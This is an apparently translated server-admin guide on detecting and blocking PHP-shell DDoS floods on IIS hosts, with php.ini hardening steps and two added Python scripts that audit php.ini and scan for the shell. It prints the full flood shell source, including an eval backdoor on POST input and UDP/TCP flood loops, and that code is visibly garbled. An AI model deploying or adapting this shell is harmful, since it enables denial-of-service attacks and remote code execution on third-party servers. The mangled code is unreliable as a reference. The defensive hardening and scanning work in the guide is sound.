The most distinctive feature of this type of attack is a surge in upload (outbound) traffic, usually from several tens of M up to nearly 100 M, enough to saturate the bandwidth of the whole server and even the whole rack, so that the site can no longer operate. Such an attack cannot be handled remotely: once the PHP shell starts running, your bandwidth is completely occupied and remote access can no longer get through.
Once you are under attack, all you can do is contact the data-centre staff and have them log onto your server and shut down IIS. Until you have found out which site was compromised, keep every site closed as far as possible, so that you are not attacked again. How do you tell whether it is this kind of attack? You cannot simply assume that shutting down IIS settles it; you need a more accurate way to confirm what the problem is. Open 360 Security Guard, go to the full list of functions, and find the Traffic Firewall. There you can see the upload and download traffic of each process (note that hidden system services must be shown as well, so click that option). Normally an abnormally large upload is a PHP DDoS attack, and typically the upload traffic of w3wp.exe and mysql.exe is very large, at least hundreds of M and up to several G. Once you know it is this attack, we can think about how to handle it.
Treatment methods:
1. Use the 360 Traffic Firewall to limit the upload traffic of w3wp.exe and mysql.exe. Set the limit according to your server's own bandwidth; normally a limit of 200-300 KB is fine, so you need not fear a large-traffic attack launched from a PHP shell. This approach has a flaw, however: after you restart the server, the limits you previously set for w3wp.exe and mysql.exe no longer apply and must be set again. Anyone using this method must keep this point in mind.
2. Change the PHP runtime configuration. Open php.ini, find the line disable_functions=, and change what follows it to: gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen. Set allow_url_fopen = Off, then find the line extension=php_sockets.dll and put a semicolon in front of it to comment it out, which blocks that extension.
3. Afterwards, look for the attack source: search every site in batch for the PHP shell attack source code. The source is reproduced below as text (it is too messy to show everyone as a picture).
The code is as follows:
```php
<?php
Eval ($_POST[CHR (90)]);
Set_time_limit (86400);
Ignore_user_abort (True);
$packets = 0;
$http = $_get[' http '];
$rand = $_get[' exit '];
$exec _time = $_get[' time ');
if (StrLen ($http) ==0 or StrLen ($rand) ==0 or StrLen ($exec _time) ==0)
{
if (StrLen ($_get[' rat ']) <>0)
{
echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat ';
Exit
}
echo "PHP Terminator";
Exit
}
for ($i =0; $i <65535; $i + +)
{
$out. = "X";
}
// Udp1-fsockopen UDP2 Pfsockopen TCP3 cc.center
$max _time = time () + $exec _time;
if ($rand ==53)
while (1)
{
$packets + +;
if (Time () > $max _time)
{
Break
}
$fp = Fsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
if ($rand ==500)
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("tcp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
?>
```
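Step 2 above is a php.ini edit that is easy to get subtly wrong. The following Python script is an added example, not code from the original post: it parses a php.ini, checks that disable_functions covers the functions listed in step 2, that allow_url_fopen is Off, and that the php_sockets.dll extension line is commented out. Two caveats a practitioner would want: ini_alter appears twice in the post's list, and popepassthru and fsocket are not names of PHP functions (popen was probably intended), so those two entries disable nothing; the checker therefore requires popen instead, which is my assumption. The two INI fragments embedded in the script are constructed.

```python
"""Audit a php.ini against step 2 of the post (added example, not from the
original post). WEAK_INI and HARDENED_INI are constructed fixtures."""

# Functions named in the post's disable_functions list, deduplicated
# (ini_alter was listed twice). "popepassthru" and "fsocket" are not PHP
# functions, so they are dropped; "popen" is added on the assumption that
# it was the intended name.
REQUIRED_DISABLED = {
    "gzinflate", "passthru", "exec", "system", "chroot", "scandir", "chgrp",
    "chown", "shell_exec", "proc_open", "proc_get_status", "ini_alter",
    "ini_restore", "dl", "pfsockopen", "openlog", "syslog", "readlink",
    "symlink", "popen", "stream_socket_server", "fsockopen",
}
ENABLED_VALUES = ("1", "on", "true", "yes")


def parse_php_ini(text):
    """Return (settings dict, list of active extension names).

    Lines beginning with ';' are comments and are skipped, which is exactly
    why the post's "put a semicolon in front of extension=php_sockets.dll"
    disables the extension."""
    settings, extensions = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("["):
            continue
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        value = value.split(";")[0].strip().strip('"')  # drop trailing comment
        if key == "extension":
            extensions.append(value.lower())
        else:
            settings[key] = value
    return settings, extensions


def audit_php_ini(text):
    """Return a list of findings; an empty list means the ini matches step 2."""
    settings, extensions = parse_php_ini(text)
    findings = []
    disabled = {f.strip().lower()
                for f in settings.get("disable_functions", "").split(",")
                if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))
    # PHP's default for allow_url_fopen is "1" (On) when the key is absent.
    if settings.get("allow_url_fopen", "1").lower() in ENABLED_VALUES:
        findings.append("allow_url_fopen is enabled; set allow_url_fopen = Off")
    if any(e in ("php_sockets.dll", "sockets") for e in extensions):
        findings.append("sockets extension is loaded; comment out extension=php_sockets.dll")
    return findings


# Constructed sample: the state the post warns about.
WEAK_INI = """[PHP]
disable_functions =
allow_url_fopen = On
extension=php_sockets.dll
"""

# Constructed sample: the post's step 2 applied (with popen instead of the
# non-existent popepassthru/fsocket entries).
HARDENED_INI = """[PHP]
disable_functions = gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popen,stream_socket_server,fsockopen
allow_url_fopen = Off
;extension=php_sockets.dll
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_php_ini(ini) or ["OK"])
```

To audit a live server, read the real php.ini into a string and pass it to audit_php_ini; run it again after every PHP upgrade, since an upgrade can replace php.ini with the vendor default.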
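Step 3 says to search every site for this source code. The following Python scanner is an added example, not code from the original post: it walks a web root and flags PHP files that contain several of the traits visible in the script above (eval of request input, a chr()-built POST key, a one-day set_time_limit, ignore_user_abort, and a UDP fsockopen/pfsockopen). Matching is case-insensitive because the sample's capitalisation is mangled and PHP function names are case-insensitive anyway. The two PHP snippets inside it are constructed fixtures, not working scripts, and the threshold of two indicators per file is my choice.

```python
"""Scan a web root for the PHP DDoS shell pattern shown on the page (added
example, not from the original post). SAMPLE_SHELL and BENIGN_PAGE are
constructed fixtures that only carry the indicator lines."""
import os
import re
import tempfile

# Case-insensitive indicators, tolerant of whitespace before "(".
INDICATORS = {
    "eval_of_request_input": r"eval\s*\(\s*\$_(post|get|request|cookie)\b",
    "chr_obfuscated_key": r"\$_(post|get|request)\s*\[\s*chr\s*\(",
    "long_time_limit": r"set_time_limit\s*\(\s*(0|[1-9]\d{3,})\s*\)",
    "ignore_user_abort": r"ignore_user_abort\s*\(",
    "udp_socket_flood": r"p?fsockopen\s*\(\s*[\"']udp://",
    "terminator_banner": r"php\s+terminator",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def scan_source(src):
    """Return the names of all indicators present in one PHP source text."""
    return [name for name, rx in COMPILED.items() if rx.search(src)]


def is_suspicious(src, threshold=2):
    """One indicator alone (e.g. fsockopen) is common in legitimate code, so a
    file is flagged only when at least `threshold` indicators co-occur."""
    return len(scan_source(src)) >= threshold


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk all sites under `root`; return {path: [indicators]} for flagged files."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    src = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if is_suspicious(src):
                hits[path] = scan_source(src)
    return hits


# Constructed fixture: only the signature lines of the page's script.
SAMPLE_SHELL = """<?php
Eval ($_POST[CHR (90)]);
Set_time_limit (86400);
Ignore_user_abort (True);
$fp = Fsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
"""

# Constructed fixture: an ordinary page that legitimately opens a TCP socket.
BENIGN_PAGE = """<?php
set_time_limit(30);
$fp = fsockopen("tcp://api.example.com", 443, $errno, $errstr, 5);
echo "hello";
"""


def demo():
    """Write both fixtures into a temporary web root and scan it.
    Returns {basename: [indicators]} so the result is easy to check."""
    with tempfile.TemporaryDirectory() as root:
        site = os.path.join(root, "site1", "uploads")
        os.makedirs(site)
        with open(os.path.join(site, "flood.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_SHELL)
        with open(os.path.join(root, "site1", "index.php"), "w", encoding="utf-8") as fh:
            fh.write(BENIGN_PAGE)
        return {os.path.basename(p): inds for p, inds in scan_tree(root).items()}


if __name__ == "__main__":
    for path, inds in demo().items():
        print(path, inds)
```

Against a real IIS host, call scan_tree on the sites root (for example C:\inetpub\wwwroot) and treat each hit as a lead, not a verdict: open the file, check its modification time against the time the upload spike began, and look for the same indicators in neighbouring upload directories.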
Several defense methods for PHP DDoS